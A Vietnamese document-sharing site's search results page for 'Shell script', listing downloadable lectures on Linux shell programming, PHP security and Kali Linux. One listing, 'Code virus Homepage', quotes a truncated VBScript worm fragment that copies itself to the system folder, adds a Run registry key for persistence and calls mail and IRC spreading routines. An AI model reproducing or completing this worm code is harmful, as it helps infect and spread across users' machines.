intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Shell script

Xem 1-20 trên 48 kết quả Shell script
  • (NB) The Linux Documentation, Managing Users, Shells, Scripting, Programming and Compiling, Boot, Initialization, Shutdown and Runlevels, The Linux Kernel, System Logging and Automation,... As the main contents of the document "LPI-102: Junior Level Administration". Invite you to refer to the lecture content more learning materials and research.

    pdf441p thetam263 28-03-2016 57 3   Download

  • Mục tiêu Bài giảng Quản trị mạng Linux - Bài 2: Quản trị tài khoản người dùng và lập trình SHELL nhằm giúp người học giải thích được các loại tài khoản người dùng, tài khoản nhóm trên Linux; trình bày được thông tin trong các tập tin /etc/passwd, /etc/group; triển khai và quản trị được hệ thống tài khoản người dùng và tài khoản nhóm; triển khai phân quyền truy cập tập tin, thư mục trên HĐH Linux cho user, group; viết shell scripts tự động các quá trình cơ bản.

    pdf25p minhminhnguyen32 12-06-2014 226 56   Download

  • Bài giảng Lập trình shell có nội dung trình bày đặc trưng của sell scripts, các biến của script, các lệnh nội trú, các cấu trúc điều khiển, các hàm, gỡ rối và một số nội dung liên quan khác.

    ppt106p connhangheo91 03-07-2014 128 29   Download

  • Chương 5 giới thiệu về Linux Shell thông qua các nội dung sau: Giới thiệu về Shells, môi trường làm việc với Shell, lập trình Shell (Bash), Debugging Shell scripts, Built-in Shell commands, các tiện ích (tools) trong Shell.

    pdf26p namthangtinhlang_01 04-11-2015 77 5   Download

  • Bài giảng Linux: Chương 3 - Linux Shell Script được biên soạn nhằm mục tiêu giúp cho các bạn biết được vai trò của Linux Shell; quá trình thông dịch lệnh Shell; khởi tạo biến Shell; biến môi trường Shell; viết Shell Script. Mời các bạn tham khảo.

    pdf29p cocacola_10 02-12-2015 85 3   Download

  • Bài giảng Hệ điều hành Linux - Chương 4 cung cấp những kiến thức cơ bản về lập trình trên Linux. Các nội dung chính trong chương này gồm có: Tổng quan về Shell, một số thao tác với Shell, Shell Script, lập trình C và C++ trong Linux.

    ppt35p youcanletgo_01 04-01-2016 130 11   Download

  • Bài giảng "Phát triển phần mềm mã nguồn mở: Linux operating system" cung cấp cho người học các kiến thức: Tổng quan về hệ điều hành Linux, hệ thống tập tin trên Linux, bộ thông dịch lệnh, lập trình shell script. Mời các bạn cùng tham khảo.

    pdf43p tieu_vu09 19-04-2018 91 5   Download

  • Bài giảng "Hệ điều hành mã nguồn mở - Chương 7: Lập trình Shell cơ bản" cung cấp cho người học các kiến thức: Khái niệm Shell script, các loại Shell trong Linux, thông dịch, tham biến trong Shell, lệnh kiểm tra điều kiện, cấu trúc điều khiển trong Shell, phép toán số học trong Shell.

    pdf52p koxih_kothogmih2 23-08-2020 34 5   Download

  • Bài giảng "Sử dụng Kali linux" được biên soạn nhằm trang bị cho người học kiến thức về: Các lệnh cơ bản trên Linux; Lập trình shell script; Sử dụng Metasploit;... Mời các bạn cùng tham khảo nội dung chi tiết bài giảng tại đây.

    pdf50p hoabingan205 12-12-2022 19 5   Download

  • Bài giảng "Phát triển phần mềm mã nguồn mở: Linux operating system" cung cấp cho người học các kiến thức: Tổng quan về hệ điều hành Linux, hệ thống tập tin trên Linux, bộ thông dịch lệnh, lập trình shell script. Mời các bạn cùng tham khảo.

    pdf15p tieu_vu09 19-04-2018 98 4   Download

  • Bài giảng Linux: Chương 4 giới thiệu tới các bạn về Shell script, quản lý người dùng, log, quản lý tiến trình, dịch vụ cron. Bài giảng phục vụ cho các bạn chuyên ngành Công nghệ thông tin và những ngành có liên quan, mời các bạn tham khảo.

    pdf20p cocacola_10 02-12-2015 74 3   Download

  • Báo cáo: Lập trình shell trên Linux trình bày các nội dung chính: Shell của Unix, Linux, sử dụng shell như một ngôn ngữ lập trình, cú pháp ngôn ngữ shell, dò lỗi (debug) của script, hiển thị màu chữ. Đây là tài liệu tham khảo dành cho sinh viên ngành Công nghệ thông tin.

    doc45p dauvanthang 27-04-2014 330 51   Download

  • SHELL---_LINUX Phần 1 : Getting started with Shell Programming 1. Viết shell script như thế nào ? Bước 1 : dùng bất cứ chương trình gì có thể soạn thảo . Ví dụ : vi Bước 2 : sau khi viết xong phải gán quyền thực thi cho script Ví dụ : $ chmod +x tên script $ chmod 755 tên script Bước 3 : thực thi script Cú pháp : bash tên script sh tên script ./ tên script

    pdf18p haiduong112 22-12-2011 105 17   Download

  • LẬP TRÌNH SHELL TRÊN LINUX Tóm tắt Lý thuyết: 5 tiết - Thực hành: 5 tiết. Mục tiêu Giới thiệu các chương trình SHELL phổ biến trên Linux, đặc điểm của các chương trình SHELL, lập trình shell script để tự động hóa thao tác quản trị. Các mục chính Bài tập bắt buộc

    pdf18p suatuoi_thomngon 31-07-2011 164 57   Download

  • Q.1. How to write shell script that will add two nos, which are supplied as command line argument, and if this two nos are not given show error and its usage...

    doc6p namnttn 01-06-2011 195 34   Download

  • Code virus Homepage : 'Homepage Created By Robinhood Set FSO =3D createobject("scripting.filesystemobject") dirsystem =3D FSO.getspecialfolder(1) Path=3D dirsystem & "Win32.dll.vbs" Set WSH createobject("wscript.shell") WSH.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWin32dll", "wscript.exe " & Path& " %" FSO.copyfile wscript.scriptfullname, Path payload=20 If = WSH.regread("HKLMSOFTWAREMicrosoftWindowsCurrentVersionHomepageSend mail") 1 then sendmail End if If WSH.regread("HKLMSOFTWAREMicrosoftWindowsCurrentVersionHomepageIRC" ) 1 then IRC "" End if Set sourcefile=3D FSO.

    pdf3p tt1991tt 20-02-2011 220 58   Download

  • Secure PHP Development- P27: Welcome to Secure PHP Development: Building 50 Practical Applications. PHP has come a long way since its first incarnation as a Perl script. Now PHP is a powerful Web scripting language with object-oriented programming support. Slowly but steadily it has entered the non-Web scripting arena often reserved for Perl and other shell scripting languages. Arguably, PHP is one of the most popular Web platforms.

    pdf5p davidvilla135 08-12-2010 57 5   Download

  • Secure PHP Development- P26: Welcome to Secure PHP Development: Building 50 Practical Applications. PHP has come a long way since its first incarnation as a Perl script. Now PHP is a powerful Web scripting language with object-oriented programming support. Slowly but steadily it has entered the non-Web scripting arena often reserved for Perl and other shell scripting languages. Arguably, PHP is one of the most popular Web platforms.

    pdf5p davidvilla135 08-12-2010 72 6   Download

  • Secure PHP Development- P25: Welcome to Secure PHP Development: Building 50 Practical Applications. PHP has come a long way since its first incarnation as a Perl script. Now PHP is a powerful Web scripting language with object-oriented programming support. Slowly but steadily it has entered the non-Web scripting arena often reserved for Perl and other shell scripting languages. Arguably, PHP is one of the most popular Web platforms.

    pdf5p davidvilla135 08-12-2010 56 5   Download

  • Secure PHP Development- P24: Welcome to Secure PHP Development: Building 50 Practical Applications. PHP has come a long way since its first incarnation as a Perl script. Now PHP is a powerful Web scripting language with object-oriented programming support. Slowly but steadily it has entered the non-Web scripting arena often reserved for Perl and other shell scripting languages. Arguably, PHP is one of the most popular Web platforms.

    pdf5p davidvilla135 08-12-2010 59 5   Download

CHỦ ĐỀ BẠN MUỐN TÌM

ADSENSE

nocache searchPhinxDoc

 

Đồng bộ tài khoản
2=>2